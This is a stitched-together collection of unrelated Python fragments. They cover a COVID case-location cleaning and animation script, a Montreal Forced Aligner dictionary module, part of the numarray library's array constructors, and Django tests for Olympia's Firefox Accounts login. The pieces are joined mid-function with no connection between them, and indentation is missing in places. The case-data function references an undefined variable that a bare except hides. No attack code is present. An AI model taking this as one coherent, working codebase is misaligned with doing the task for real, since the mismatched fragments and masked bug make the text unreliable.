:data: pd.DataFrame, data from sheet
:colnames: list, list of columns we are keeping for final version
'''
df = data.copy()
df.rename({x: x.strip() for x in df.columns}, inplace=True, axis=1)
# drop invalid lat/longs
lat,lon = df.latitude, df.longitude
invalid_lat = lat.str.contains('#REF') | lat.str.contains('N/A') | lat.isnull() | (lat == '')
invalid_lon = lon.str.contains('#REF') | lon.str.contains('N/A') | lon.isnull() | (lon == '')
invalid = invalid_lat | invalid_lon
df = df[~invalid] # NOT invalid
# Only keep those that have a date_confirmation
df['date_confirmation'] = df['date_confirmation'].str.strip() # some have empty spaces
dc = df.date_confirmation
dc = dc.fillna('')
dc = dc.apply(lambda x: x.split('-')[1].strip() if '-' in x else x.strip())
valid_date = (dc != '') & ~(dc.isnull()) & dc.str.match('.*\d{2}\.\d{2}\.\d{4}.*')
df = df[valid_date]
df['date_confirmation'] = df['date_confirmation'].str.strip()
# Basic cleaning for strings
for c in ['city', 'province', 'country']:
df[c] = df[c].str.strip()
df[c] = df[c].str.title()
df[c] = df[c].str.replace('\xa0', ' ') # encoding for a space that was found in some entries.
# Only keep the columns we want
df = df[colnames]
return df
def reduceToUnique(data: pd.DataFrame) -> list:
'''
Get counts for unique locations (by lat/long combination).
Output is a records style list [{d1}, {d2}, ... {}].
Does some situatinal name changing for consistency, but this should be done on Curator's side.
'''
df = data.copy()
groups = df.groupby(['latitude', 'longitude'])
results = []
for g in groups:
lat, lon = g[0]
cut = g[1]
count = len(cut)
try:
# Uniques to flag inconsistencies.
cities = cut.city.unique()
provinces = cut.province.unique()
countries = cut.country.unique()
# Subject to change.
city = cities[0]
province = provinces[0]
country = countries[0]
if 'Singapore' in countries:
city = ''
province = ''
country = 'Singapore'
elif 'Macau' in provinces:
city = ''
province = 'Macau'
country = 'China'
else:
# get city that occurs the most.
if len(cities) > 1:
vcounts = cut.city.value_counts()
city = vcounts[vcounts == vcounts.max()].index[0]
# Only display this info on map if N cases == 1
age = cut.age.values[0] if count == 1 else ''
sex = cut.sex.values[0] if count == 1 else ''
symptoms = cut.symptoms.values[0] if count == 1 else ''
source = cut.source.values[0] if count == 1 else ''
geo_resolution = cut.geo_resolution.values[0]
d = {
'latitude': lat,
'longitude': lon,
'city': city,
'province': province,
'country': country,
'age': age,
'sex': sex,
'symptoms': symptoms,
'source': source,
'date_confirmation': date_confirmation,
'cases': count,
'geo_resolution' : geo_resolution
}
results.append(d)
except:
d = {
'latitude': lat,
'longitude': lon,
'city': city,
'province': province,
'country': country,
'age': '',
'sex': '',
'symptoms': '',
'source': '',
'date_confirmation' : '',
'cases': count,
'geo_resolution': geo_resolution
}
results.append(d)
return results
def animation_formating(infile):
'''
Read from "full-data" and convert to something usable for the animation.
'''
with open(infile, 'r') as F:
data = json.load(F)
data = data['data']
data = pd.DataFrame(data)
data = data[['latitude', 'longitude', 'date_confirmation']]
# drop #REF! in case they are propagated here :
data = data[data.latitude != '#REF!']
data = data[data.longitude != '#REF!']
data = data[data.date_confirmation != '#REF!']
data['date'] = pd.to_datetime(data.date_confirmation, errors='coerce', format='%d.%m.%Y')
data['coord'] = data.apply(lambda s: str('{}|{}'.format(s['latitude'], s['longitude'])), axis=1)
# data.drop(['date_confirmation', 'latitude', 'longitude'], inplace=True, axis=1)
data.dropna(inplace=True)
# Sort so that results are in order (might be important for animation)
data.sort_values(by='date', inplace=True)
sums = {} # To store cumulative sums at each location
results = {}
# Loop through dates and coordinates and count
for date in data.date.unique():
datestr = pd.to_datetime(date).strftime('%Y-%m-%d') # unique coverts to np.datetime64, which doesn't have strftime.
if datestr not in results.keys():
results[datestr] = []
subset = data[data.date == date]
for coord in subset.coord.unique():
N_cases = len(subset[subset.coord == coord])
if coord not in sums.keys():
sums[coord] = N_cases
else:
sums[coord] += N_cases
lat, long = coord.split('|')
results[datestr].append({'caseCount': sums[coord],
'latitude': lat,
'longitude': long})
if sums[coord] < 10:
pin = 'pin4.svg'
elif sums[coord] >= 10 and sums[coord] < 25:
pin = 'pin3.svg'
elif sums[coord] >= 25 and sums[coord] < 50:
pin = 'pin2.svg'
else:
pin = 'pin1.svg'
results[datestr][-1]['pin'] = pin
# Reformatting data to fit with animation script :
dates = results.keys()
array = [{d: results[d]} for d in dates]
return array
def animation_formating_geo(infile: str, outfile: str, groupby: str = 'week') -> None:
'''
Read from full data file, and reformat for animation.
Currently grouping on a weekly basis, but subject to change as
| |
<reponame>prosodylab/Montreal-Forced-Aligner<gh_stars>0
"""Pronunciation dictionaries for use in alignment and transcription"""
from __future__ import annotations
import abc
import collections
import math
import os
import re
import subprocess
import sys
import typing
from typing import TYPE_CHECKING, Dict, Optional, Tuple
import sqlalchemy.orm.session
from sqlalchemy.orm import selectinload
from montreal_forced_aligner.data import PhoneType, WordType
from montreal_forced_aligner.db import (
DictBundle,
Dictionary,
Grapheme,
OovWord,
Phone,
Pronunciation,
Speaker,
Utterance,
Word,
)
from montreal_forced_aligner.dictionary.mixins import (
SanitizeFunction,
SplitWordsFunction,
TemporaryDictionaryMixin,
)
from montreal_forced_aligner.exceptions import (
DictionaryError,
DictionaryFileError,
KaldiProcessingError,
)
from montreal_forced_aligner.helper import split_phone_position
from montreal_forced_aligner.models import DictionaryModel, PhoneSetType
from montreal_forced_aligner.utils import thirdparty_binary
if TYPE_CHECKING:
from dataclasses import dataclass
else:
from dataclassy import dataclass
__all__ = [
"MultispeakerDictionaryMixin",
"MultispeakerDictionary",
"MultispeakerSanitizationFunction",
]
@dataclass
class MultispeakerSanitizationFunction:
"""
Function for sanitizing text based on a multispeaker dictionary
Parameters
----------
speaker_mapping: dict[str, str]
Mapping of speakers to dictionary names
sanitize_function: :class:`~montreal_forced_aligner.dictionary.mixins.SanitizeFunction`
Function to use for stripping punctuation
split_functions: dict[str, :class:`~montreal_forced_aligner.dictionary.mixins.SplitWordsFunction`]
Mapping of dictionary ids to functions for splitting compounds and clitics into separate words
"""
speaker_mapping: Dict[str, int]
sanitize_function: SanitizeFunction
split_functions: Dict[int, SplitWordsFunction]
def get_dict_id_for_speaker(self, speaker_name: str) -> int:
"""
Get the dictionary id of the speaker
Parameters
----------
speaker_name: str
Speaker to look up
Returns
-------
int
Dictionary id
"""
if speaker_name not in self.speaker_mapping:
speaker_name = "default"
return self.speaker_mapping[speaker_name]
def get_functions_for_speaker(
self, speaker_name: str
) -> Tuple[SanitizeFunction, SplitWordsFunction]:
"""
Look up functions based on speaker name
Parameters
----------
speaker_name
Speaker to get functions for
Returns
-------
:class:`~montreal_forced_aligner.dictionary.mixins.SanitizeFunction`
Function for sanitizing text
:class:`~montreal_forced_aligner.dictionary.mixins.SplitWordsFunction`
Function for splitting up words
"""
try:
dict_id = self.get_dict_id_for_speaker(speaker_name)
split_function = self.split_functions[dict_id]
except KeyError:
split_function = None
return self.sanitize_function, split_function
class MultispeakerDictionaryMixin(TemporaryDictionaryMixin, metaclass=abc.ABCMeta):
"""
Mixin class containing information about a pronunciation dictionary with different dictionaries per speaker
Parameters
----------
dictionary_path : str
Dictionary path
kwargs : kwargs
Extra parameters to passed to parent classes (see below)
See Also
--------
:class:`~montreal_forced_aligner.dictionary.mixins.DictionaryMixin`
For dictionary parsing parameters
:class:`~montreal_forced_aligner.abc.TemporaryDirectoryMixin`
For temporary directory parameters
Attributes
----------
dictionary_model: :class:`~montreal_forced_aligner.models.DictionaryModel`
Dictionary model
dictionary_lookup: dict[str, int]
Mapping of dictionary names to ids
"""
def __init__(self, dictionary_path: str = None, **kwargs):
super().__init__(**kwargs)
self.dictionary_model = DictionaryModel(
dictionary_path, phone_set_type=self.phone_set_type
)
self._num_dictionaries = None
self.dictionary_lookup = {}
self._phone_mapping = None
self._grapheme_mapping = None
self._words_mappings = {}
self._default_dictionary_id = None
self._dictionary_base_names = None
self.bracket_regex = None
self.laughter_regex = None
self.compound_regex = None
self.clitic_cleanup_regex = None
self.clitic_marker = None
self.use_g2p = False
@property
def dictionary_base_names(self) -> Dict[int, str]:
"""Mapping of base file names for pronunciation dictionaries"""
if self._dictionary_base_names is None:
with self.session() as session:
dictionaries = session.query(Dictionary.id, Dictionary.name).all()
self._dictionary_base_names = {}
for d_id, d_name in dictionaries:
base_name = d_name
if any(d_name == x[1] and d_id != x[0] for x in dictionaries):
base_name += f"_{d_id}"
self._dictionary_base_names[d_id] = base_name
return self._dictionary_base_names
def word_mapping(self, dictionary_id: int = 1) -> Dict[str, int]:
"""
Get the word mapping for a specified dictionary id
Parameters
----------
dictionary_id: int, optional
Database ID for dictionary, defaults to 1
Returns
-------
dict[str, int]
Mapping from words to their integer IDs for Kaldi processing
"""
if dictionary_id not in self._words_mappings:
self._words_mappings[dictionary_id] = {}
index = 0
with self.session() as session:
words = session.query(Word.word, Word.mapping_id).filter(
Word.dictionary_id == dictionary_id
)
for w, index in words:
self._words_mappings[dictionary_id][w] = index
if index == 0:
return self._words_mappings[dictionary_id]
self._words_mappings[dictionary_id]["#0"] = index + 1
self._words_mappings[dictionary_id]["<s>"] = index + 2
self._words_mappings[dictionary_id]["</s>"] = index + 3
return self._words_mappings[dictionary_id]
def reversed_word_mapping(self, dictionary_id: int = 1) -> Dict[int, str]:
"""
Get the reversed word mapping for a specified dictionary id
Parameters
----------
dictionary_id: int, optional
Database ID for dictionary, defaults to 1
Returns
-------
dict[int, str]
Mapping from integer IDs to words for Kaldi processing
"""
mapping = {}
for k, v in self.word_mapping(dictionary_id).items():
mapping[v] = k
return mapping
@property
def num_dictionaries(self) -> int:
"""Number of pronunciation dictionaries"""
return len(self.dictionary_lookup)
@property
def sanitize_function(self) -> MultispeakerSanitizationFunction:
"""Sanitization function for the dictionary"""
sanitize_function = SanitizeFunction(
self.clitic_marker,
self.clitic_cleanup_regex,
self.punctuation_regex,
self.word_break_regex,
self.bracket_regex,
self.bracket_sanitize_regex,
self.ignore_case,
)
split_functions = {}
non_speech_regexes = {}
if self.laughter_regex is not None:
non_speech_regexes[self.laughter_word] = self.laughter_regex
if self.bracket_regex is not None:
non_speech_regexes[self.bracketed_word] = self.bracket_regex
with self.session() as session:
dictionaries = session.query(Dictionary.id, Dictionary.default)
speaker_mapping = {
x[0]: x[1] for x in session.query(Speaker.name, Speaker.dictionary_id)
}
for dict_id, default in dictionaries:
if default:
speaker_mapping["default"] = dict_id
clitic_set = set(
x[0]
for x in session.query(Word.word)
.filter(Word.word_type == WordType.clitic)
.filter(Word.dictionary_id == dict_id)
)
initial_clitic_regex = None
final_clitic_regex = None
if self.clitic_marker is not None:
initial_clitics = sorted(
x for x in clitic_set if x.endswith(self.clitic_marker)
)
final_clitics = sorted(
x for x in clitic_set if x.startswith(self.clitic_marker)
)
if initial_clitics:
initial_clitic_regex = re.compile(rf"^{'|'.join(initial_clitics)}(?=\w)")
if final_clitics:
final_clitic_regex = re.compile(rf"(?<=\w){'|'.join(final_clitics)}$")
split_functions[dict_id] = SplitWordsFunction(
self.clitic_marker,
initial_clitic_regex,
final_clitic_regex,
self.compound_regex,
non_speech_regexes,
self.oov_word,
self.word_mapping(dict_id),
self.grapheme_mapping,
self.specials_set,
)
return MultispeakerSanitizationFunction(
speaker_mapping, sanitize_function, split_functions
)
def dictionary_setup(self) -> Tuple[typing.Set[str], collections.Counter]:
"""Set up the dictionary for processing"""
self.compile_regexes()
exist_check = os.path.exists(self.db_path)
if not exist_check:
self.initialize_database()
auto_set = {PhoneSetType.AUTO, PhoneSetType.UNKNOWN, "AUTO", "UNKNOWN"}
if not isinstance(self.phone_set_type, PhoneSetType):
self.phone_set_type = PhoneSetType[self.phone_set_type]
os.makedirs(self.dictionary_output_directory, exist_ok=True)
pretrained = False
if self.non_silence_phones:
pretrained = True
self._speaker_ids = getattr(self, "_speaker_ids", {})
self._current_speaker_index = getattr(self, "_current_speaker_index", 1)
dictionary_id_cache = {}
with self.session() as session:
for speaker_id, speaker_name in session.query(Speaker.id, Speaker.name):
self._speaker_ids[speaker_name] = speaker_id
if speaker_id >= self._current_speaker_index:
self._current_speaker_index = speaker_id + 1
for (
dictionary_id,
dict_name,
default,
max_disambiguation_symbol,
path,
) in session.query(
Dictionary.id,
Dictionary.name,
Dictionary.default,
Dictionary.max_disambiguation_symbol,
Dictionary.path,
):
dictionary_id_cache[path] = dictionary_id
self.dictionary_lookup[dict_name] = dictionary_id
self.max_disambiguation_symbol = max(
self.max_disambiguation_symbol, max_disambiguation_symbol
)
if default:
self._default_dictionary_id = dictionary_id
word_primary_key = 1
pronunciation_primary_key = 1
word_objs = []
pron_objs = []
speaker_objs = []
phone_counts = collections.Counter()
graphemes = set()
for (
dictionary_model,
speakers,
) in self.dictionary_model.load_dictionary_paths().values():
if dictionary_model.path not in dictionary_id_cache and not self.use_g2p:
word_cache = {}
pronunciation_cache = set()
subsequences = set()
pronunciation_counts = collections.defaultdict(int)
if self.phone_set_type not in auto_set:
if (
self.phone_set_type != dictionary_model.phone_set_type
and dictionary_model.phone_set_type not in auto_set
):
raise DictionaryError(
f"Mismatch found in phone sets: {self.phone_set_type} vs {dictionary_model.phone_set_type}"
)
else:
self.phone_set_type = dictionary_model.phone_set_type
dictionary = Dictionary(
name=dictionary_model.name,
path=dictionary_model.path,
phone_set_type=self.phone_set_type,
root_temp_directory=self.dictionary_output_directory,
position_dependent_phones=self.position_dependent_phones,
clitic_marker=self.clitic_marker if self.clitic_marker is not None else "",
bracket_regex=self.bracket_regex.pattern
if self.bracket_regex is not None
else "",
clitic_cleanup_regex=self.clitic_cleanup_regex.pattern
if self.clitic_cleanup_regex is not None
else "",
laughter_regex=self.laughter_regex.pattern
if self.laughter_regex is not None
else "",
default="default" in speakers,
use_g2p=False,
max_disambiguation_symbol=0,
silence_word=self.silence_word,
oov_word=self.oov_word,
bracketed_word=self.bracketed_word,
laughter_word=self.laughter_word,
optional_silence_phone=self.optional_silence_phone,
)
session.add(dictionary)
session.flush()
dictionary_id_cache[dictionary_model.path] = dictionary.id
if dictionary.default:
self._default_dictionary_id = dictionary.id
self._words_mappings[dictionary.id] = {}
current_index = 0
word_objs.append(
{
"id": word_primary_key,
"mapping_id": current_index,
"word": self.silence_word,
"word_type": WordType.silence,
"dictionary_id": dictionary.id,
}
)
self._words_mappings[dictionary.id][self.silence_word] = current_index
current_index += 1
pron_objs.append(
{
"id": pronunciation_primary_key,
"pronunciation": self.optional_silence_phone,
"probability": 1.0,
"disambiguation": None,
"silence_after_probability": None,
"silence_before_correction": None,
"non_silence_before_correction": None,
"word_id": word_primary_key,
}
)
word_primary_key += 1
pronunciation_primary_key += 1
special_words = {self.oov_word: WordType.oov}
if self.bracket_regex is not None:
special_words[self.bracketed_word] = WordType.bracketed
if self.laughter_regex is not None:
special_words[self.laughter_word] = WordType.laughter
specials_found = set()
if not os.path.exists(dictionary_model.path):
raise DictionaryFileError(dictionary_model.path)
with open(dictionary_model.path, "r", encoding="utf8") as inf:
for i, line in enumerate(inf):
line = line.strip()
if not line:
continue
line = line.split()
word = line.pop(0)
if len(line) == 0:
raise DictionaryError(
f'Error parsing line {i} of {dictionary_model.path}: "{line}" did not have a pronunciation'
)
if self.ignore_case:
word = word.lower()
if " " in word:
continue
if self.clitic_cleanup_regex is not None:
word = self.clitic_cleanup_regex.sub(self.clitic_marker, word)
if not line:
raise DictionaryError(
f"Line {i} of {dictionary_model.path} does not have a pronunciation."
)
if word in self.specials_set:
continue
characters = list(word)
if word not in special_words:
graphemes.update(characters)
prob = None
try:
if len(line) <= 1:
raise ValueError
prob = float(line[0])
if prob > 1 or prob < 0.01:
raise ValueError
line.pop(0)
except ValueError:
pass
silence_after_prob = None
silence_before_correct = None
non_silence_before_correct = None
try:
if len(line) <= 3:
raise ValueError
silence_after_prob = float(line[0])
if (
silence_after_prob == dictionary.silence_probability
or silence_after_prob == 0
):
silence_after_prob = None
silence_before_correct = float(line[1])
if silence_before_correct == 1.0 or silence_before_correct == 0:
silence_before_correct = None
non_silence_before_correct = float(line[2])
if (
non_silence_before_correct == 1.0
or non_silence_before_correct == 0
):
non_silence_before_correct = None
line = line[3:]
except ValueError:
pass
pron = tuple(line)
if pretrained:
difference = (
set(pron) - self.non_silence_phones - self.silence_phones
)
if difference:
self.excluded_phones.update(difference)
self.excluded_pronunciation_count += 1
continue
if word not in word_cache:
if pron == (self.optional_silence_phone,):
wt = WordType.silence
elif dictionary.clitic_marker is not None and (
word.startswith(dictionary.clitic_marker)
| |
if isinstance(sequence, _gen.NDArray):
if (not copy
and (type is None or type==sequence.type())
and (shape is None or shape==sequence.getshape())):
return sequence
if type is not None:
a=sequence.astype(type)
else:
a=sequence.copy()
if shape is not None:
a.setshape(shape)
return a
if _gen.SuitableBuffer(sequence):
return NumArray(buffer=sequence,type=type,shape=shape)
if isinstance(sequence,str):
return fromstring(sequence,type,shape)
if isinstance(sequence,unicode):
raise ValueError("unicode sequence objects not currently handled")
if isinstance(sequence,file):
return fromfile(sequence,type,shape)
if (hasattr(sequence,'__getitem__')
and hasattr(sequence,'__len__')):
return fromlist(sequence,type,shape)
##SEQUENCE is a scalar or unhandleable
##fromlist will complain in the latter case
if isinstance(sequence, _nt.scalarTypes):
if shape is None:
shape = ()
sequence = [sequence]
return fromlist(sequence,type,shape)
def asarray(seq, type=None, typecode=None, dtype=None):
"""converts scalars, lists and tuples to numarray if possible.
passes NumArrays thru making copies only to convert types.
"""
if isinstance(seq, _gen.NDArray) and type is None and typecode is None:
return seq
return array(seq, type=type, typecode=typecode, copy=0, dtype=dtype)
inputarray = asarray # Obsolete synonym
def fromstring(datastring, type=None, shape=None, typecode=None, dtype=None):
"""Create an array from binary data contained in a string (by copying)
If type is None (the default), the returned array will be of type Int8.
If shape is None (the default), the returned shape will be
(len(datastring),).
"""
type = _nt._typeFromKeywords(type, typecode, dtype)
if type is None:
type=_nt.Int8
if not shape:
size, rem = divmod(len(datastring), type.bytes)
if rem:
raise ValueError("Type size inconsistent with string length")
else:
shape = (size,) # default to a 1-d array
elif _type(shape) is types.IntType:
shape = (shape,)
if len(datastring) != (_gen.product(shape)*type.bytes):
raise ValueError("Specified shape and type inconsistent with string length")
arr = NumArray(shape=shape, type=type)
strbuff = buffer(datastring)
nelements = arr.nelements()
# Currently uses only the byte-by-byte copy, should be optimized to use
# larger element copies when possible.
cfunc = _bytes.functionDict["copyNbytes"]
cfunc((nelements,), strbuff, 0, (type.bytes,),
arr._data, 0, (type.bytes,), type.bytes)
if arr._type is _nt.Bool:
ufunc.not_equal(arr, 0, arr)
return arr
def fromfile(infile,type=None,shape=None,sizing=STRICT,
typecode=None,dtype=None):
"""Read in an array from INFILE, a file-like object or a filename.
INFILE must have a read() method. If it also has the tell() and
seek() methods memory allocation will be more efficient when the
SHAPE is unspecified or incomplete, and the filesize is
unchanging.
If INFILE is a string or unicode object, a file with that name is
opened for reading.
INFILE should be in binary mode on systems where that makes sense
(e.g., Win32). read() must be blocking, and if len(read(size)) <
size, it is assumed that end of file has been reached, and no
further read()s are attempted.
If TYPE is None, TYPE is set to Int32.
If SHAPE is None, it is set to (-1,).
Shape completely specified
--------------------------
When SHAPE is completely specified, exactly
TYPE.bytes*product(SHAPE) bytes will be read from INFILE, from the
current position. In this case SIZING must be STRICT. If
end-of-file is reached before the required amount of data has been
read, an EarlyEOFError is raised.
Shape incompletely specified
----------------------------
If SHAPE is incompletely specified (contains a -1), data will be
read from INFILE until EOF is reached.
The amount of data used to form the returned array will be a
multiple of `record size', where record size is the product of
TYPE.bytes and the specified elements of SHAPE. If the amount of
data read when end-of-file is reached is not an exact multiple of
the record size, one of the following will occur:
1) if SIZING==STRICT, a SizeMismatchError is raised (default),
2) if SIZING==SLOPPY, the extra data will be silently disregarded,
3) if SIZING==WARN, a SizeMismatchWarning is issued.
In cases (2) and (3), if there is extra data, an attempt is made
to position the file cursor to just after the last byte actually
used; this will only succeed if the file has a seek() method. If
the seek() fails, a FileSeekWarning is issued, but no error is
raised.
"""
type = _nt._typeFromKeywords(type, typecode, dtype)
if isinstance(infile,(str,unicode)):
infile=open(infile,"rb")
if type is None:
type=_nt.Int32
type = _nt.getType(type) # allow for typenames and Numeric charcodes
if shape is None:
shape=(-1,)
if(list(shape).count(-1)>1):
raise ValueError("At most one unspecified dimension in shape")
if -1 not in shape:
if not sizing == STRICT:
raise ValueError("sizing must be STRICT if size complete")
arr=NumArray(type=type,shape=shape)
bytesleft=type.bytes*_gen.product(shape)
bytesread=0
while bytesleft > _BLOCKSIZE:
data=infile.read(_BLOCKSIZE)
if len(data) != _BLOCKSIZE:
raise EarlyEOFError("Unexpected EOF reading data for size complete array")
arr._data[bytesread:bytesread+_BLOCKSIZE]=data
bytesread += _BLOCKSIZE
bytesleft -= _BLOCKSIZE
if bytesleft > 0:
data = infile.read(bytesleft)
if len(data) != bytesleft:
raise EarlyEOFError("Unexpected EOF reading data for size complete array")
arr._data[bytesread:bytesread+bytesleft]=data
return arr
##shape is incompletely specified
##read until EOF
##implementation 1: naively use memory blocks
##problematic because memory allocation can be double what is
##necessary (!)
##the most common case, namely reading in data from an unchanging
##file whose size may be determined before allocation, should be
##quick -- only one allocation will be needed.
recsize = type.bytes * _gen.product([i for i in shape if i != -1])
blocksize = max(_BLOCKSIZE/recsize, 1)*recsize
##try to estimate file size
try:
curpos=infile.tell()
infile.seek(0,2)
endpos=infile.tell()
infile.seek(curpos)
except (AttributeError, IOError):
initsize=blocksize
else:
initsize=max(1,(endpos-curpos)/recsize)*recsize
buf = memory.new_memory(initsize)
bytesread=0
while 1:
data=infile.read(blocksize)
if len(data) != blocksize: ##eof
break
##do we have space?
if len(buf) < bytesread+blocksize:
buf=_resizebuf(buf,len(buf)+blocksize)
## or rather a=resizebuf(a,2*len(a)) ?
assert len(buf) >= bytesread+blocksize
buf[bytesread:bytesread+blocksize]=data
bytesread += blocksize
if len(data) % recsize != 0:
if sizing == STRICT:
raise SizeMismatchError("Filesize does not match specified shape")
if sizing == WARN:
_warnings.warn("Filesize does not match specified shape",
SizeMismatchWarning)
try:
infile.seek(-(len(data) % recsize),1)
except AttributeError:
_warnings.warn("Could not rewind (no seek support)",
FileSeekWarning)
except IOError:
_warnings.warn("Could not rewind (IOError in seek)",
FileSeekWarning)
datasize = (len(data)/recsize) * recsize
if len(buf) != bytesread+datasize:
buf=_resizebuf(buf,bytesread+datasize)
buf[bytesread:bytesread+datasize]=data[:datasize]
##deduce shape from len(buf)
shape = list(shape)
uidx = shape.index(-1)
shape[uidx]=len(buf) / recsize
a = NumArray(buffer=buf,shape=shape,type=type)
if a._type is _nt.Bool:
ufunc.not_equal(a, 0, a)
return a
def _resizebuf(buf,newsize):
"Return a copy of BUF of size NEWSIZE."
newbuf=memory.new_memory(newsize)
if newsize > len(buf):
newbuf[:len(buf)]=buf
else:
newbuf[:]=buf[:len(newbuf)]
return newbuf
class UsesOpPriority(object):
"""Classes can subclass from UsesOpPriority to signal to numarray
that perhaps the class' r-operator hook (e.g. __radd__) should be
given preference over NumArray's l-operator hook (e.g. __add__).
This would be done so that when different object types are used in
an operation (e.g. NumArray + MaskedArray) the type of the result
is well defined and independent of the order of the operands
(e.g. MaskedArray).
Before altering the "normal" behavior of an operator, this scheme
(implemented in the operator hook functions of NumArray) first
checks to see if the other operand subclasses UsesOpPriority. If
it does, the op priorities of both operands are compared, and an
appropriate hook function from the one with the highest priority
is called.
Thus, a subclass of NumArray which wants to ensure that its type
dominates in mixed type operations should define a class level
op_priority > 0. If several subclasses wind up doing this,
op_priority will determine how they relate to one another as well.
"""
op_priority = 0.0
class NumArray(_numarray._numarray, _gen.NDArray, UsesOpPriority):
"""Fundamental numerical array class.
NumArray(shape=None, type=None, buffer=None, byteoffset=0, bytestride=None,
byteorder=sys.byteorder, aligned=1, real=None, imag=None)
shape The shape of the resulting array.
type The type of each data element, e.g. Int32.
buffer An object which supports the Python buffer protocol in C.
byteoffset Offset in bytes from the start of 'buffer' to the array data.
bytestride Distance in bytes between single elements.
byteorder The actual ordering of bytes in buffer: "big" or "little".
aligned Flag declaring whether array data is aligned, or not. legacy.
real Initializer for real component of complex arrays.
imag Initializer for imaginary component of complex arrays.
"""
if _PROTOTYPE:
def __init__(self, shape=None, type=None, buffer=None,
byteoffset=0, bytestride=None, byteorder=_sys.byteorder,
aligned=1, real=None, imag=None):
type = _nt.getType(type)
itemsize = type.bytes
_gen.NDArray.__init__(self, shape, itemsize, buffer,
byteoffset, bytestride)
self._type = type
if byteorder in ["little", "big"]:
self._byteorder = byteorder
else:
raise ValueError("byteorder must be 'little' or 'big'")
if real is not None:
self.real = real
if imag is not None:
self.imag = imag
def _copyFrom(self, arr):
"""Copy elements from another | |
# -*- coding: utf-8 -*-
import base64
import urlparse
from datetime import datetime
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.contrib.messages import get_messages
from django.core.urlresolvers import resolve, reverse
from django.test import RequestFactory
from django.test.utils import override_settings
import mock
from waffle.models import Switch
from rest_framework.test import APIRequestFactory, APITestCase
from rest_framework_jwt.serializers import VerifyJSONWebTokenSerializer
from olympia.access.acl import action_allowed_user
from olympia.access.models import Group, GroupUser
from olympia.accounts import verify, views
from olympia.amo.helpers import absolutify, urlparams
from olympia.amo.tests import (
assert_url_equal, create_switch, user_factory, APITestClient,
InitializeSessionMixin, PatchMixin, TestCase, WithDynamicEndpoints)
from olympia.api.tests.utils import APIKeyAuthTestCase
from olympia.users.models import UserProfile
FXA_CONFIG = {
'oauth_host': 'https://accounts.firefox.com/v1',
'client_id': 'amodefault',
'redirect_url': 'https://addons.mozilla.org/fxa-authenticate',
'scope': 'profile',
}
@override_settings(FXA_CONFIG={'default': FXA_CONFIG, 'internal': FXA_CONFIG})
class BaseAuthenticationView(APITestCase, PatchMixin,
InitializeSessionMixin):
def setUp(self):
self.url = reverse(self.view_name)
self.fxa_identify = self.patch(
'olympia.accounts.views.verify.fxa_identify')
class TestFxALoginWaffle(APITestCase):
def setUp(self):
self.login_url = reverse('accounts.login')
self.register_url = reverse('accounts.register')
self.source_url = reverse('accounts.source')
def test_login_422_when_waffle_is_on(self):
response = self.client.post(self.login_url)
assert response.status_code == 422
def test_register_422_when_waffle_is_on(self):
response = self.client.post(self.register_url)
assert response.status_code == 422
def test_source_200_when_waffle_is_on(self):
response = self.client.get(self.source_url, {'email': '<EMAIL>'})
assert response.status_code == 200
@override_settings(FXA_CONFIG={'current-config': FXA_CONFIG})
class TestLoginStartBaseView(WithDynamicEndpoints, TestCase):
class LoginStartView(views.LoginStartBaseView):
DEFAULT_FXA_CONFIG_NAME = 'current-config'
def setUp(self):
super(TestLoginStartBaseView, self).setUp()
self.endpoint(self.LoginStartView, r'^login/start/')
self.url = '/en-US/firefox/login/start/'
self.initialize_session({})
def test_state_is_set(self):
self.initialize_session({})
assert 'fxa_state' not in self.client.session
state = 'somerandomstate'
with mock.patch('olympia.accounts.views.generate_fxa_state',
lambda: state):
self.client.get(self.url)
assert 'fxa_state' in self.client.session
assert self.client.session['fxa_state'] == state
def test_redirect_url_is_correct(self):
self.initialize_session({})
with mock.patch('olympia.accounts.views.generate_fxa_state',
lambda: 'arandomstring'):
response = self.client.get(self.url)
assert response.status_code == 302
url = urlparse.urlparse(response['location'])
redirect = '{scheme}://{netloc}{path}'.format(
scheme=url.scheme, netloc=url.netloc, path=url.path)
assert redirect == 'https://accounts.firefox.com/v1/authorization'
assert urlparse.parse_qs(url.query) == {
'action': ['signin'],
'client_id': ['amodefault'],
'redirect_url': ['https://addons.mozilla.org/fxa-authenticate'],
'scope': ['profile'],
'state': ['arandomstring'],
}
def test_state_is_not_overriden(self):
self.initialize_session({'fxa_state': 'thisisthestate'})
self.client.get(self.url)
assert self.client.session['fxa_state'] == 'thisisthestate'
def test_to_is_included_in_redirect_state(self):
path = '/addons/unlisted-addon/'
# The =s will be stripped from the URL.
assert '=' in base64.urlsafe_b64encode(path)
state = 'somenewstatestring'
self.initialize_session({})
with mock.patch('olympia.accounts.views.generate_fxa_state',
lambda: state):
response = self.client.get(self.url, data={'to': path})
assert self.client.session['fxa_state'] == state
url = urlparse.urlparse(response['location'])
query = urlparse.parse_qs(url.query)
state_parts = query['state'][0].split(':')
assert len(state_parts) == 2
assert state_parts[0] == state
assert '=' not in state_parts[1]
assert base64.urlsafe_b64decode(state_parts[1] + '====') == path
def test_to_is_excluded_when_unsafe(self):
path = 'https://www.google.com'
self.initialize_session({})
response = self.client.get(
'{url}?to={path}'.format(path=path, url=self.url))
url = urlparse.urlparse(response['location'])
query = urlparse.parse_qs(url.query)
assert ':' not in query['state'][0]
def has_cors_headers(response, origin='https://addons-frontend'):
return (
response['Access-Control-Allow-Origin'] == origin and
response['Access-Control-Allow-Credentials'] == 'true')
def update_domains(overrides):
overrides = overrides.copy()
overrides['CORS_ORIGIN_WHITELIST'] = ['addons-frontend', 'localhost:3000']
return overrides
endpoint_overrides = [
(regex, update_domains(overrides))
for regex, overrides in settings.CORS_ENDPOINT_OVERRIDES]
@override_settings(
FXA_CONFIG={'default': FXA_CONFIG},
CORS_ENDPOINT_OVERRIDES=endpoint_overrides)
class TestLoginView(BaseAuthenticationView):
client_class = APITestClient
view_name = 'accounts.login'
def setUp(self):
super(TestLoginView, self).setUp()
self.client.defaults['HTTP_ORIGIN'] = 'https://addons-frontend'
self.state = 'stateaosidoiajsdaagdsasi'
self.initialize_session({'fxa_state': self.state})
self.code = 'codeaosidjoiajsdioasjdoa'
self.update_user = self.patch(
'olympia.accounts.views.update_user')
def options(self, url, origin):
return self.client_class(HTTP_ORIGIN=origin).options(url)
def test_correct_config_is_used(self):
assert views.LoginView.DEFAULT_FXA_CONFIG_NAME == 'default'
assert views.LoginView.ALLOWED_FXA_CONFIGS == (
['default', 'amo', 'local'])
def test_cors_addons_frontend(self):
response = self.options(self.url, origin='https://addons-frontend')
